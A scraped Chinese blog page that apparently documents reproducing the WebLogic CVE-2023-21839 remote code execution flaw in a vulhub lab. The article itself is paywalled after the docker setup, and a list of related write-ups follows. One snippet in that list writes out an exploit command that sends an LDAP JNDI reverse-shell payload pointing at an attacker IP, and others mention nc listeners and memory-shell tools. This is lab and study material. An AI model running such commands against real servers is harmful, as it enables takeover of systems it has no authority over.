CVE-2023-21839 【vulhub weblogic 漏洞复现】

最新推荐文章于 2024-09-04 10:17:13 发布
原创 最新推荐文章于 2024-09-04 10:17:13 发布 · 459 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web安全 #ubuntu

该博客详细介绍了CVE-2023-21839漏洞,这是一个影响Weblogic Server的安全问题,允许未经验证的攻击者通过IIOP/T3协议执行任意命令。文中提供了一步步的环境搭建和漏洞复现步骤,包括在Kali Linux上下载POC,安装Go环境,使用JNDIExploit工具进行攻击,并讨论了如何处理反弹shell的问题。

漏洞概述

由于Weblogic IIOP/T3协议存在缺陷,当IIOP/T3协议开启时,允许未经身份验证的攻击者通过IIOP/T3协议网络访问攻击存在安全风险的WebLogic Server,漏洞利用成功WebLogic Server可能被攻击者接管执行任意命令导致服务器沦陷或者造成严重的敏感数据泄露。

环境搭建

contos7 (我的环境在)

进入环境

image.png

启动容器

docker-compose up -d			//启动容器		(绿色done代表启动成功)
docker-compose ps -a			//查看状态

image.png
image.png

浏览访问

靶机ip+分配端口/console
输入后等一会
地址:http://192.168.10.30:7001/console

最低0.47元/天 解锁文章
Eternity@@
关注
CVE-2023-21839Weblogic反序列化漏洞复现
薛定谔嘚喵博客
04-16 5397
WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。
[ vulhub漏洞复现篇 ] WebLogic Server 远程代码执行漏洞复现 (CVE-2023-21839)
qq_51577576的博客
03-12 2584
[ vulhub漏洞复现篇 ] WebLogic Server 远程代码执行漏洞复现 (CVE-2023-21839) WebLogic是美商Oracle的主要产品之一,系购并得来。是商业市场上主要的Java应用服务器软件之一,是世界上第一个成功商业化的J2EE应用服务器,目前已推出到14c版。而此产品也延伸出WebLogic Portal, WebLogic Integration等企业用的中间件,以及OEPE开发工具。
JNDIExploit-1.4-SNAPSHOT.jar
01-10
编译后的JNDIExploit-1.4-SNAPSHOT.jar,可以直接用,1.4版本支持tomcatBypass路由直接上线msf。
JNDIExploit-用于 JNDI注入利用的工具
04-16
一款用于 JNDI注入利用的工具,大量参考/引用了Rogue JNDI项目的代码,支持直接植入内存shell,并集成了常见的bypass 高版本JDK的方式,适用于与自动化工具配合使用。 使用 java -jar JNDIExploit.jar -h 查看参数说明,其中 --ip 参数为必选参数
Weblogic远程代码执行漏洞CVE-2023-21839)复现
yunshang_secure的博客
12-23 3984
复现过程中,会出现各种各样报错,小伙伴多找网上文章解决,本文仅作参考。
CVE-2023-21839漏洞复现(基于vulhub)
weixin_63960760的博客
09-11 1769
由于Weblogic IIOP/T3协议存在缺陷,当IIOP/T3协议开启时,允许未经身份验证的攻击者通过IIOP/T3协议网络访问攻击存在安全风险的WebLogic Server,漏洞利用成功WebLogic Server可能被攻击者接管执行任意命令导致服务器沦陷或者造成严重的敏感数据泄露。
CVE-2023-21839 weblogic rce漏洞复现
wutiangui的博客
11-04 2710
C:\Program Files\Java\jdk1.8.0_181\bin>java -jar G:\资料\vulhub复现\weblogic\可行工具\Weblogic-CVE-2023-21839.jar 192.168.232.131:7001 ldap://192.168.180.2:1389/Basic/ReverseShell/192.168.180.2/2000。执行以上命令可以在dnslog上获得回显,即可验证可能存在该漏洞复现之前请务必切换路径到jdk路径下。
Weblogic反序列化漏洞原理分析及漏洞复现(CVE-2018-2628/CVE-2023-21839复现)
热门推荐
网络空间安全学习
09-19 1万+
WebLogic 存在远程代码执行漏洞CVE-2023-21839/CNVD-2023-04389),由于Weblogic IIOP/T3协议存在缺陷,当IIOP/T3协议开启时,允许未经身份验证的攻击者通过IIOP/T3协议网络访问攻击存在安全风险的WebLogic Server,漏洞利用成功WebLogic Server可能被攻击者接管执行任意命令导致服务器沦陷或者造成严重的敏感数据泄露。远程方法调用,除了该对象本身的虚拟机,其它的虚拟机也可以调用该对象的方法。
vulhubWeblogic未授权远程代码执行漏洞复现 (CVE-2023-21839)
yougexiaojiuguan的博客
03-10 544
漏洞复现过程的记录
复现CVE-2023-21839
Coder的博客
05-02 2028
下载jdk1.8或#创建java文件夹#解压后更改文件夹名字为 jdk1.8.0.372#将文件夹移动到/usr/local/java目录下验证是否安装成功javac如有提示,安装完成。
漏洞复现-Weblogic远程代码执行漏洞(CVE-2023-21839)
玄道的网安博客
08-13 742
ForeignOpaqueReference继承自OpaqueReference,前面说过,当远程对象继承自OpaqueReference时,客户端在对该对象进行JNDI查找并获取的时候,服务器端实际上是通过调用远程对象的getReferent()方法来获取该对象的实际引用。远程对象继承OpaqueReference时,该对象进行JNDI查找并获取时,服务器端实际上是通过调用远程对象的getReferent()方法来获取该对象的。
漏洞复现Weblogic CVE-2023-21839
zg_111的博客
03-23 7640
Weblogic CVE-2023-21839漏洞复现
【高危】WebLogic Server 远程代码执行漏洞复现及攻击拦截 (CVE-2023-21839)
xsharkrasp的博客
05-18 754
近日,Oracle WebLogic Server被检测到远程代码执行漏洞(CVE-2023-21839),该漏洞允许未经身份验证的远程攻击者通过T3/IIOP协议网络访问并破坏WebLogic服务器,成功利用此漏洞可导致关键数据的未授权访问或直接获取WebLogic服务器权限。当远程对象继承自OpaqueReference时,客户端在对该对象进行JNDI查找并获取的时候,服务器端实际上是通过调用远程对象的getReferent()方法来获取该对象的实际引用。发起攻击请求:新建/tmp/1.txt文件。
weblogic-cve-2023-21839漏洞复现-kali
最新发布
gasdfjjdjdjrje_的博客
09-04 644
CVE-2023-21839 是 Oracle WebLogic Server 中 T3 协议的漏洞。T3 协议是一种用于 Java 对象的远程方法调用(RMI)的内部协议,通常用于服务器间通信和客户端与服务器的交互。攻击者利用该漏洞可以发送恶意的序列化数据,导致服务器在处理数据时执行任意代码。由于 WebLogic 支持通过 T3 协议远程访问,这使得此漏洞极其危险,因为攻击者无需身份验证即可远程触发。
CVE-2023-21839漏洞本地简单复现
crowsec
02-27 6953
CVE-2023-21839漏洞复现
weblogic CVE-2023-21839 复现
m0_65096687的博客
05-25 862
1.使用工具JNDIExploit-1.2-SNAPSHOT.jar在kali上设置监听 (JNDIExploit-1.2-SNAPSHOT.jar自己下载移动到攻击机。这里是用的docker下载vulhubCVE-2023-21839。这里需要go语言进行编译 go版本大于1.19。靶机和攻击机都是192.168.85.131。让你访问ip:7001/console。2.nc开监听反弹shell。nc上反弹了一个shell。docker 启动环境。
WebLogic Server 远程代码执行漏洞复现 (CVE-2023-21839)
qq_50854662的博客
02-28 1521
WebLogic Server 远程代码执行漏洞复现 (CVE-2023-21839)
CVE-2023-21839 Weblogic远程代码执行漏洞复现
热爱学习,喜欢折腾!
04-24 1278
WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。
CVE-2023-38646
07-28
- *2* *3* [[ vulhub漏洞复现篇 ] WebLogic Server 远程代码执行漏洞复现 (CVE-2023-21839)](https://blog.csdn.net/qq_51577576/article/details/129466378)[target="_blank" data-report-click={"spm":"1018.2226....
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值